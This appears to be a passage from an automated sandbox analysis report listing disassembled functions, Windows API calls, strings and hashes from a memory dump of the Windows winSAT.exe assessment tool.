                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CurrentPriorityThread$ClassErrorLastObjectProcessSingleWait
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3692216418-0
                                                                                                                                                                                              • Opcode ID: 86a1ec4f503f6666c108cf009ea67f132ca5e7043b0c0dc8c67e6ce2d79444f3
                                                                                                                                                                                              • Instruction ID: 1d09ef4db26f6ced5deaf9b5e4059e4100fe5fc5580f184052d5111d622db820
                                                                                                                                                                                              • Opcode Fuzzy Hash: 86a1ec4f503f6666c108cf009ea67f132ca5e7043b0c0dc8c67e6ce2d79444f3
                                                                                                                                                                                              • Instruction Fuzzy Hash: B1115436518A41C7E7105B65E844278FAA1FB9AB65FB9C170CA1E433A4CF7CE444CA20
                                                                                                                                                                                              Function 00007FF780FDB968 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 184memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Heap$ErrorFirmwareFreeLastProcessSystemTable
                                                                                                                                                                                              • String ID: BMSR
                                                                                                                                                                                              • API String ID: 3869690938-2095607670
                                                                                                                                                                                              • Opcode ID: ee4f7e08065957f2ebc5bd6590fe5fca6c49313bd9dffbce6c117e25d0c3da26
                                                                                                                                                                                              • Instruction ID: 7a526d171de3d54ac14ec1fd05748f608a6e233f1d91c62c87816e2447094a1d
                                                                                                                                                                                              • Opcode Fuzzy Hash: ee4f7e08065957f2ebc5bd6590fe5fca6c49313bd9dffbce6c117e25d0c3da26
                                                                                                                                                                                              • Instruction Fuzzy Hash: 79719262B0C64292EA10AF52D5481BAE7A0BB85BD4FA0D032DE4E477D5EE3CF946C310
                                                                                                                                                                                              Function 00007FF780FDBC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 184memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Heap$ErrorFirmwareFreeLastProcessSystemTable
                                                                                                                                                                                              • String ID: BMSR
                                                                                                                                                                                              • API String ID: 3869690938-2095607670
                                                                                                                                                                                              • Opcode ID: 071c8e3e797dcafe17e81e80cc5a941c3872d7999182a5d7e7d25e8c5b0d8aab
                                                                                                                                                                                              • Instruction ID: c8a7686921faabb26c7865fa6de4923799843c24b1ff930324d7e67e2280772c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 071c8e3e797dcafe17e81e80cc5a941c3872d7999182a5d7e7d25e8c5b0d8aab
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4371C122B0C68292EA10AF11D9485BEE7A5BB55BC4FE0C031DE4E437D6EE38F956C310
                                                                                                                                                                                              Function 00007FF780FDB70C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 160memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemFirmwareTable.KERNEL32(?,?,?,?,00000000,?,?,00000400,00007FF780FD92CF), ref: 00007FF780FDB743
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,00000400,00007FF780FD92CF), ref: 00007FF780FDB75E
                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,?,?,?,00000000,?,?,00000400,00007FF780FD92CF), ref: 00007FF780FDB7C6
                                                                                                                                                                                              • HeapFree.KERNEL32(?,?,?,?,00000000,?,?,00000400,00007FF780FD92CF), ref: 00007FF780FDB7DA
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Heap$ErrorFirmwareFreeLastProcessSystemTable
                                                                                                                                                                                              • String ID: BMSR
                                                                                                                                                                                              • API String ID: 3869690938-2095607670
                                                                                                                                                                                              • Opcode ID: 04334c09dc74d1c414cbc76c198a3ef9b2aab1e15ced6529a43d476549b201c4
                                                                                                                                                                                              • Instruction ID: 871b2cca678aa93784a3895bbe0d53afb13a94a74fbea63b8b2e40c779c4cbea
                                                                                                                                                                                              • Opcode Fuzzy Hash: 04334c09dc74d1c414cbc76c198a3ef9b2aab1e15ced6529a43d476549b201c4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 28518222A0C68286EB50AF2194482BDEBA1BF85B94FA4D131DE5D473D5DE3CE586C720
                                                                                                                                                                                              Function 00007FF780F951E8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleModule$CriticalInitializeSection
                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                              • API String ID: 1351695566-2766056989
                                                                                                                                                                                              • Opcode ID: 39e3a0f571b844d2cc6073091d0d7022794c40353ce1d93e0298a0fd54517ee6
                                                                                                                                                                                              • Instruction ID: e831c1d4b0f62b71e7b575782309a8f3f0ae8c103310c56282c1face85cb2d35
                                                                                                                                                                                              • Opcode Fuzzy Hash: 39e3a0f571b844d2cc6073091d0d7022794c40353ce1d93e0298a0fd54517ee6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 13715936609B818AE700EF71E4043AE77B4FB45B6CF548239CE591B3A8DF789169C724
                                                                                                                                                                                              Function 00007FF780FDB510 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Heap$ErrorFirmwareFreeLastProcessSystemTable
                                                                                                                                                                                              • String ID: BMSR
                                                                                                                                                                                              • API String ID: 3869690938-2095607670
                                                                                                                                                                                              • Opcode ID: 1f3144977a68b95f1a5eb06a1c43a53725c816e5bb445a56a9994b85d34872ad
                                                                                                                                                                                              • Instruction ID: bb3b7ac1c7405d6b1a0399cbe1ae574af6930ac5b5df28d938ec89daa5a03a4e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f3144977a68b95f1a5eb06a1c43a53725c816e5bb445a56a9994b85d34872ad
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0951F562B0C682D2E610AF21E94827DEBA0BF45794FA4C131DE1E433D5EE38F986C710
                                                                                                                                                                                              Function 00007FF780F94D30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98threadsynchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ResumeThread$ObjectSingleWait_beginthreadex
                                                                                                                                                                                              • String ID: base\winsat\exe\WinSATOp.h
                                                                                                                                                                                              • API String ID: 2423865506-1141357602
                                                                                                                                                                                              • Opcode ID: eb3a2edf79ba8b4b4177111bb82672b12e4ad478017cb0450fd2a16dd265b27a
                                                                                                                                                                                              • Instruction ID: e33ddac61ae55e95ad235033c2c671f8ff93f950408ce5c853156601fd56c744
                                                                                                                                                                                              • Opcode Fuzzy Hash: eb3a2edf79ba8b4b4177111bb82672b12e4ad478017cb0450fd2a16dd265b27a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7941D433609B4286EB11EF11D4486B8B761FB94BA4FA48235CA6E473D4DF39F481C750
                                                                                                                                                                                              Function 00007FF780FD6730 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 90fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$CurrentDeleteDirectoryFile
                                                                                                                                                                                              • String ID: TempWinSAT*.*$WinSAT_Storage*.*$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1384586179-2937672210
                                                                                                                                                                                              • Opcode ID: d2d69fbc7dd97be8e17ac9269385d11ac2f116bd9115a1230a9e0af1de29ef6a
                                                                                                                                                                                              • Instruction ID: 37efbf014e7dcd0b9c331845a8824b4459deb0fcba95f2abad81563d6fa2211e
                                                                                                                                                                                              • Opcode Fuzzy Hash: d2d69fbc7dd97be8e17ac9269385d11ac2f116bd9115a1230a9e0af1de29ef6a
                                                                                                                                                                                              • Instruction Fuzzy Hash: D7314F32B19A4695EB10AF61D8446BC6760FF48B98F989231DE1D537D4DF38E842C3A0
                                                                                                                                                                                              Function 00007FF780FA25A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow__uncaught_exceptionstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: s is null
                                                                                                                                                                                              • API String ID: 541657574-2156393446
                                                                                                                                                                                              • Opcode ID: 16fe2a6d43e0df51381a4fa468cf86348126c17c47c81dedc7f72812749f5f38
                                                                                                                                                                                              • Instruction ID: 140a5cdbd765b8c820449d462cd1cea91c66730bc44ff850473fdd5605f9ec17
                                                                                                                                                                                              • Opcode Fuzzy Hash: 16fe2a6d43e0df51381a4fa468cf86348126c17c47c81dedc7f72812749f5f38
                                                                                                                                                                                              • Instruction Fuzzy Hash: E5212961B1DA4681EF20FB26E4613B9A360BF807A4FF09231DA6E073D5DE1CE405C320
                                                                                                                                                                                              Function 00007FF780FCE194 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 82COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FCDC70: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDD45
                                                                                                                                                                                                • Part of subcall function 00007FF780FCDC70: GetFileSizeEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDD69
                                                                                                                                                                                                • Part of subcall function 00007FF780FCDC70: SetEndOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDD8E
                                                                                                                                                                                                • Part of subcall function 00007FF780FCDC70: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDDC1
                                                                                                                                                                                                • Part of subcall function 00007FF780FCDC70: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDDDC
                                                                                                                                                                                                • Part of subcall function 00007FF780FCDC70: WriteFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE11
                                                                                                                                                                                                • Part of subcall function 00007FF780FCDC70: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE24
                                                                                                                                                                                                • Part of subcall function 00007FF780FCDC70: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE37
                                                                                                                                                                                                • Part of subcall function 00007FF780FCDC70: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE47
                                                                                                                                                                                                • Part of subcall function 00007FF780FCCF3C: EventRegister.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000035,00007FF780F9E9C1), ref: 00007FF780FCCF63
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00007FF780FCE1B1
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE41F
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetCurrentProcessId.KERNEL32 ref: 00007FF780FCE440
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetTickCount.KERNEL32 ref: 00007FF780FCE459
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _snprintf_s.MSVCRT ref: 00007FF780FCE48C
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _vsnprintf_s.MSVCRT ref: 00007FF780FCE4DB
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE500
                                                                                                                                                                                              • SetCriticalSectionSpinCount.KERNEL32 ref: 00007FF780FCE1F5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CriticalEventSection$CountEnabled$BuffersCloseCreateCurrentEnterErrorFlushHandleLastLeaveLocalProcessRegisterSizeSpinTickTimeWrite_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: ERROR: Cannot Initilize ETW provider %s$base\winsat\exe\logging.cpp$log
                                                                                                                                                                                              • API String ID: 1492999411-3845554977
                                                                                                                                                                                              • Opcode ID: f596098e47200d1251045281062a3cda2fb09e0b4ebe28b3160109981f106ce1
                                                                                                                                                                                              • Instruction ID: 053088b523757586cad4bd2bd7835dc7ed934b39f15232bb51cf14a910502598
                                                                                                                                                                                              • Opcode Fuzzy Hash: f596098e47200d1251045281062a3cda2fb09e0b4ebe28b3160109981f106ce1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 98316F22A0C68292EA00BB61E8421F9E750FF82324FE49531E58D47BD6DF6CF905CB60
                                                                                                                                                                                              Function 00007FF780FD0784 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 0-1001986530
                                                                                                                                                                                              • Opcode ID: 2abe1c20187925642ad10e24843f8d74f2deb6fa143236af3500a98d4bce4be5
                                                                                                                                                                                              • Instruction ID: 593c74906d6843bd6791cbc6c94d655257f56f0ccb2b93d85faeb403791e66f2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2abe1c20187925642ad10e24843f8d74f2deb6fa143236af3500a98d4bce4be5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 73310676A097419BD768DF2AE68066DBBB0FB49B40B548139DB4A83F40CB38F461CB00
                                                                                                                                                                                              Function 00007FF780FCC7F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$memchrmemcpystd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: str is null
                                                                                                                                                                                              • API String ID: 2056636401-2182108151
                                                                                                                                                                                              • Opcode ID: 0c79b91977f09b31f1d62c3f2033448527853ec86a7c8e906a2554c533aa5b20
                                                                                                                                                                                              • Instruction ID: 6faa84c6fcd23af9d8c7231dc3cc62526ad4b91c2e94562f215d31438849086b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c79b91977f09b31f1d62c3f2033448527853ec86a7c8e906a2554c533aa5b20
                                                                                                                                                                                              • Instruction Fuzzy Hash: C931E252E18B8542EA50EB39D5113B9A321FF557D4FA0D331DA9D056E6EF6CF185C300
                                                                                                                                                                                              Function 00007FF780FD56F8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 45timeCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CancelWaitableTimer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF780F999D0), ref: 00007FF780FD5731
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CancelTimerWaitable
                                                                                                                                                                                              • String ID: Cannot cancel the assessment watch dog timer$Dying - Cannot cancel the assessment watch dog timer$base\winsat\exe\watchdog.cpp
                                                                                                                                                                                              • API String ID: 2866266559-70004805
                                                                                                                                                                                              • Opcode ID: 6d23ad5b4842020336e17c7bb996bddf6203b26903ddba621eb442bb162bfb6d
                                                                                                                                                                                              • Instruction ID: 254abe0679108977506d63aee07217b59a658b31b101480af0a4ca226ae2787f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d23ad5b4842020336e17c7bb996bddf6203b26903ddba621eb442bb162bfb6d
                                                                                                                                                                                              • Instruction Fuzzy Hash: DC110525E0D507C2F758BB54E8682B9A760BF85B11FF08136C80E827E0DFBDB446C620
                                                                                                                                                                                              Function 00007FF780F95E70 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Event$Enabled$CountCurrentErrorLastProcessTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: Cancel event has been set.$ERROR: cannot set cancel event: %S$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1673490931-415747489
                                                                                                                                                                                              • Opcode ID: a643dc333af21f37e50e7a871fa087e6123769e1657eee19d4dd45b9c6d09fa8
                                                                                                                                                                                              • Instruction ID: 6e8b03a658444d43477e7cc737ff924933033ff891e19b69d1739004e1dc57c8
